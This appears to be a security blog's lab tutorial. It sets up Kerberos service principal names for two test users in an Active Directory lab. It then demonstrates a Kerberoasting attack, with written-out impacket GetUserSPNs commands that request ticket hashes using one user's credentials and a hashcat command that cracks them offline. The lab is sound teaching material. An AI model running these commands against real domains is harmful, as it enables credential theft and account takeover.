Having already set up Active directory as per (https://vk9-sec.com/active-directory-dns-lab/). We can set up the SPN service for testing purposes.

To use Kerberos authentication requires both the following conditions to be true:

  • The client and server computers must be part of the same Windows domain, or in trusted domains.
  • A Service Principal Name (SPN) must be registered with Active Directory, which assumes the role of the Key Distribution Center in a Windows domain.

The SPN is sent to the Key Distribution Center to obtain a security token for authenticating the connection. If a security token can’t be obtained, authentication uses NTLM.

SPN Formats

Beginning with SQL Server 2008, the SPN format is changed in order to support Kerberos authentication on TCP/IP, named pipes, and shared memory. The supported SPN formats for named and default instances are as follows.

Named instance

  • MSSQLSvc/<FQDN>:[<port> | <instancename>], where:
    • MSSQLSvc is the service that is being registered.
    • <FQDN> is the fully qualified domain name of the server.
    • <port> is the TCP port number.
    • <instancename> is the name of the SQL Server instance.

Default instance

  • MSSQLSvc/<FQDN>:<port> | MSSQLSvc/<FQDN>, where:
    • MSSQLSvc is the service that is being registered.
    • <FQDN> is the fully qualified domain name of the server.
    • <port> is the TCP port number.
SPN format Description
MSSQLSvc/<FQDN>:<port> The provider-generated, default SPN when TCP is used. <port> is a TCP port number.
MSSQLSvc/<FQDN> The provider-generated, default SPN for a default instance when a protocol other than TCP is used. <FQDN> is a fully qualified domain name.
MSSQLSvc/<FQDN>:<instancename> The provider-generated, default SPN for a named instance when a protocol other than TCP is used. <instancename> is the name of an instance of SQL Server.

Procedure

1. Add 2 users that will be added to the SPN list

  • Server Manager – Tools – Active Directory Users and Computers
  • Users

2. Right click users and add a new user

  • Users – New – User
  • Next

NOTE: I will add user1 & user2

2. Then, add the password for each. In this example this will be as:

  • user1/Password1
  • user2/Password2

3. Having the user account already we will proceed to add those to SPN

  • echo %computername%
  • setspn -A WIN2K19-AD/user1.vk9-sec.com vk9-sec\user1
  • setspn -A WIN2K19-AD/user2.vk9-sec.com vk9-sec\user2

4. Confirm these were added

  • setspn -T vk9-sec.com -Q */*

Testing Kerberoasting tools

1. Get the domain users

  • python3.9 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all vk9-sec.com/user1:Password1 -dc-ip 192.168.0.100

2. Get the users listed for SPN, and save the output to tgs.hash

  • python3.9 /opt/impacket/examples/GetUserSPNs.py vk9-sec.com/user1:Password1 -dc-ip 192.168.0.100 -request -output tgs.hash

3. Check the new file contents, we can see the users hash

  • cat tgs.hash

4. Crack the hashes using hashcat

  • hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt –force –potfile-disable

Note: We could crack user1 & user2 only by having user1 credentials.

 

Categories: Labs

0 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *